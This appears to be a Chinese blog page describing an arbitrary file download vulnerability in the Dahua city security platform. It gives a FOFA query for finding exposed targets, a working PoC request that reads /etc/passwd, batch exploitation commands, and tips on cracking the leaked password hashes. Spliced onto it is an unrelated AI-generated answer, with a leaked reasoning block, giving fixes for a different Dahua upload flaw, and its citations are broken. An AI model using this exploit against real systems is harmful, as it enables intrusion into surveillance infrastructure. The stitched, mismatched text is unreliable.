大华城市安防系统平台任意文件下载漏洞

一、漏洞描述

大华城市安防监控系统平台是一款集视频、报警、存储、管理于一体的综合安防解决方案。该平台支持多种接入方式,包括网络视频、模拟视频、数字视频、IP电话、对讲机等。此外,该平台还支持多种报警方式,包括移动侦测、区域入侵、越线报警、人员聚集等。

大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。

二、网络空间搜索引擎查询

fofa查询

app="dahua-DSS"

三、漏洞复现

poc

GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

浏览器直接访问 http://ip:port/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd,可下载文件

四、批量检测与利用

单个检测与利用

 python .\DDS-Download.py -u http://ip:port

对密码进行解密(MD5免费在线解密破解_MD5在线加密-SOMD5 或者 md5在线解密破解,md5解密加密

点到为止,远程登录服务器,这里就不在演示了。

批量检测

python .\DDS-Download.py -f  filename 

关注微信公众号 网络安全透视镜 回复 20231007 获取检测利用脚本

<think>好的,我需要处理用户关于大华智慧园区综合管理平台bitmap接口任意文件上传漏洞的修复方案请求。首先,我需要回顾提供的引用内容,确保准确理解漏洞的具体情况和现有信息。 根据引用[1]、[2]、[3]和[4],漏洞出现在/soap/bitmap或/emap/webservice/gis/soap/bitmap接口处,攻击者可上传恶意文件获取服务器权限。修复的关键点包括文件类型验证、大小限制、路径过滤、权限控制等。 接下来,用户需要的是修复方案。我需要将这些引用中的信息整合成结构化的建议,确保每个措施都有依据。例如,引用[2]提到未限制文件类型和大小,因此修复措施应包括白名单验证和大小限制。引用[3]提到路径过滤不足,所以需要安全路径配置。引用[4]建议限制访问来源,因此需要网络层防护。 同时,要注意使用中文回答,符合用户要求。避免技术术语过于复杂,确保清晰易懂。需要分步骤列出修复方案,并补充临时缓解措施,如引用[4]提到的限制暴露在公网。 最后,生成相关问题时要围绕漏洞修复、检测、影响和案例,确保问题相关且有价值。检查是否有遗漏的引用内容,并确保所有建议都有对应的引用支持,如引用编号正确。 现在组织回答结构:漏洞描述、修复方案(分点)、临时措施、引用来源,最后相关问题。确保每个修复点都有对应的引用标注,例如文件类型验证对应引用[2],路径过滤对应引用[3]等。</think>### 大华智慧园区综合管理平台bitmap接口任意文件上传漏洞修复方案 #### 漏洞描述 该漏洞存在于平台的`/emap/webservice/gis/soap/bitmap`接口(部分版本路径为`/soap/bitmap`),由于未对上传文件的类型、大小、路径及权限进行严格过滤,导致攻击者可构造恶意文件(如WebShell)直接上传至服务器,进而获取系统控制权限[^1][^2][^3]。 --- #### 修复方案(分步骤) 1. **文件类型白名单验证** - 限制上传文件扩展名为业务必需的类型(如`.jpg`、`.png`等),禁止`.jsp`、`.php`、`.war`等可执行文件类型。 - 示例代码实现: ```java String[] allowedTypes = {"jpg", "png", "gif"}; if (!Arrays.asList(allowedTypes).contains(fileExt)) { throw new SecurityException("非法文件类型"); } ``` 2. **文件内容与格式校验** - 使用文件头校验(Magic Number)判断真实文件类型,避免通过修改扩展名绕过检测。 - 示例:通过`BufferedImage`类验证图片文件合法性。 3. **文件大小与上传频率限制** - 设定单文件最大尺寸(如10MB)及单位时间内上传次数阈值,防止大文件攻击或DoS。 4. **安全路径配置** - 禁止用户指定上传路径,固定文件存储目录为不可执行区域(如非Web根目录)[^3]。 - 配置示例(Nginx): ```nginx location /uploads/ { deny all; # 禁止直接访问上传目录 } ``` 5. **权限最小化原则** - 将上传接口服务运行账户权限降级,限制其对系统关键目录的写入/执行权限[^3]。 6. **接口身份认证加固** - 为上传接口添加Token验证或Session校验,禁止未授权访问[^4]。 7. **日志监控与告警** - 记录上传操作的IP、时间、文件哈希等,对异常行为(如高频上传、非常规文件类型)触发实时告警[^4]。 --- #### 临时缓解措施 若无法立即修复,建议: 1. 通过防火墙策略限制`/soap/bitmap`接口仅允许内网IP访问[^4]。 2. 使用WAF(Web应用防火墙)拦截包含`<%`、`<?php`等危险字符的上传请求[^4]。 --- #### 参考来源 : 大华智慧园区综合管理平台bitmap文件上传漏洞描述 : 漏洞成因分析(文件类型/大小未过滤) : 接口路径与权限配置缺陷说明 [^4]: 网络暴露风险与临时防护建议 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值